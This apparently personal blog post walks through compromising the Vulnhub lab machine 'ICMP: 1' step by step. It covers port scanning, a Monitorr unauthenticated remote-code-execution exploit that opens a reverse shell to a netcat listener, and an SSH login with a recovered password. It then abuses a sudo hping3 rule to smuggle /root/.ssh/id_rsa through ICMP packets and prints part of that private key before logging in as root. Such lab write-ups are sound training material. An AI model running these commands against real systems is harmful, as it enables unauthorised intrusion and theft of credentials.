Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub ICMP: 1 Walkthrough

https://www.vulnhub.com/entry/icmp-1,633/


Scan ports, find 22 and 80.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ nmap -sV -sC -p- 192.168.56.81  -oN ports.log
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))


Scan port 80.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ gobuster dir -u http://192.168.56.81  -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 400,403,404,500 --wildcard
/index.php (Status: 302)
/mon (Status: 301)

Open port 80 in firefox, it's a system monitor program named "Monitorr". Searchspolit show it may has vulnerability.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ searchsploit monitorr           
----------------------------------------------------- ---------------------------------
 Exploit Title                        |  Path
----------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass        | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthentic | php/webapps/48980.py
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


Use 48980.py to get reverse shell.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ python3 48980.py http://192.168.56.81/mon 192.168.56.150 1234
------------------------------------------------------------------------------
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.150] from (UNKNOWN) [192.168.56.81] 44222
bash: cannot set terminal process group (498): Inappropriate ioctl for devicebash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@icmp:/var/www/html/mon/assets/data/usrimg$

In fox's home folder, find a reminder txt file, and a "devel" folder we can not enter.

www-data@icmp:/home/fox$ cd /home/fox
cd /home/fox
www-data@icmp:/home/fox$ ls -la
ls -la
total 20
drwxr-xr-x 3 root root 4096 Dec  3 16:08 .
drwxr-xr-x 3 root root 4096 Dec  3 16:04 ..
lrwxrwxrwx 1 root root    9 Dec  3 16:08 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3 16:05 devel
-rw-r--r-- 1 fox  fox    33 Dec  3 16:08 local.txt
-rw-r--r-- 1 root root   78 Dec  3 16:08 reminder
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
www-data@icmp:/home/fox$

Through the note, we guess maybe there is a file named crypt.php in devel.

www-data@icmp:/home/fox$ ls -la devel/crypt.php
ls -la devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec  3 16:05 devel/crypt.php
www-data@icmp:/home/fox$ cat devel/crypt.php
cat devel/crypt.php
<?php
echo crypt('.............','da');
?>


Now we can try to log in ssh as fox with the password. Then check sudo.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ ssh fox@192.168.56.81                                                          1 ⚙
fox@192.168.56.81's password: 
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
...
Last login: Fri Mar 12 05:43:09 2021 from 192.168.56.150
$ sudo -l
[sudo] password for fox: 
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
$


Now we need to add two terminal at victim's machine. One terminal send and one terminal receive.

Here is the first terminal. Press Ctrl+C when second terminal receive all private key data.

fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa  
HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=5102 icmp_seq=0 rtt=6.6 ms
...
len=128 ip=127.0.0.1 ttl=64 id=8754 icmp_seq=30 rtt=2.6 ms
^C
--- 127.0.0.1 hping statistic ---
31 packets transmitted, 31 packets received, 0% packet loss
round-trip min/avg/max = 0.6/4.8/8.1 ms

Here is the second terminal.

fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe  
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqcCz/pKzjVNZi9zdKJDkvhMhY8lOb2Qth8e/3bLJ/ssgmRLoJXAQ
...
qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix
q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw==
-----END OPENSSH PRIVATE KEY-----


Now we can ssh in as root.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ ssh root@192.168.56.81 -i id_rsa                                                                                                                                                                       130 ⨯ 1 ⚙
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar 12 05:55:54 2021 from 192.168.56.150
root@icmp:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
icmp


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0